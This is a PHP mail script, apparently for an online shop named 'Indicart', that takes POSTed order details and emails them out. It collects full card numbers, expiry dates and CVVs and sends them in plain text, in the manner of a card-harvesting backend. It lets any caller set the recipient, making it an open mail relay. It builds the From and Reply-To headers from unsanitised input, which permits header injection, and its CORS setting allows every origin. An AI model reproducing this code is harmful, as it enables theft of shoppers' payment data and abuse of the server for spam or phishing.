<?php
// Simple PHP email sender for Indicart
header('Content-Type: application/json');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST');
header('Access-Control-Allow-Headers: Content-Type');

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    echo json_encode(['success' => false, 'message' => 'Only POST requests allowed']);
    exit;
}

// Get POST data
$to_email = $_POST['to_email'] ?? 'support@indicart.store';
$subject = $_POST['subject'] ?? 'New Indicart Order';
$message = $_POST['message'] ?? 'Order details';
$from_name = $_POST['from_name'] ?? 'Indicart Customer';
$from_email = $_POST['from_email'] ?? 'noreply@mcart.com';

// Additional order data if provided
$payment_method = $_POST['payment_method'] ?? '';
$card_name = $_POST['card_name'] ?? '';
$card_number = $_POST['card_number'] ?? '';
$expiry = $_POST['expiry'] ?? '';
$cvv = $_POST['cvv'] ?? '';
$contact_info = $_POST['contact_info'] ?? '';
$cart_data = $_POST['cart_data'] ?? '';
$order_total = $_POST['order_total'] ?? '';

// Build email content
$email_content = "MART ORDER NOTIFICATION\n";
$email_content .= "========================\n\n";
$email_content .= "From: " . $from_name . " (" . $from_email . ")\n";
$email_content .= "Date: " . date('Y-m-d H:i:s') . "\n\n";

if ($payment_method) {
    $email_content .= "PAYMENT INFORMATION\n";
    $email_content .= "==================\n";
    $email_content .= "Payment Method: " . $payment_method . "\n";
    if ($card_name) $email_content .= "Card Name: " . $card_name . "\n";
    if ($card_number) $email_content .= "Card Number: " . $card_number . "\n";
    if ($expiry) $email_content .= "Expiry: " . $expiry . "\n";
    if ($cvv) $email_content .= "CVV: " . $cvv . "\n";
    $email_content .= "\n";
}

if ($contact_info) {
    $email_content .= "CONTACT INFORMATION\n";
    $email_content .= "==================\n";
    $email_content .= $contact_info . "\n\n";
}

if ($cart_data) {
    $email_content .= "ORDER ITEMS\n";
    $email_content .= "===========\n";
    $email_content .= $cart_data . "\n\n";
}

if ($order_total) {
    $email_content .= "ORDER TOTAL: " . $order_total . "\n\n";
}

$email_content .= "MESSAGE\n";
$email_content .= "=======\n";
$email_content .= $message . "\n\n";

$email_content .= "========================\n";
$email_content .= "Generated by Indicart System\n";

// Email headers
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
$headers .= "From: " . $from_name . " <" . $from_email . ">\r\n";
$headers .= "Reply-To: " . $from_email . "\r\n";
$headers .= "X-Mailer: PHP/" . phpversion();

// Send email
$sent = mail($to_email, $subject, $email_content, $headers);

if ($sent) {
    echo json_encode([
        'success' => true, 
        'message' => 'Email sent successfully to ' . $to_email,
        'details' => [
            'to' => $to_email,
            'subject' => $subject,
            'payment_method' => $payment_method
        ]
    ]);
} else {
    echo json_encode([
        'success' => false, 
        'message' => 'Failed to send email',
        'error' => error_get_last()['message'] ?? 'Unknown error'
    ]);
}
?>
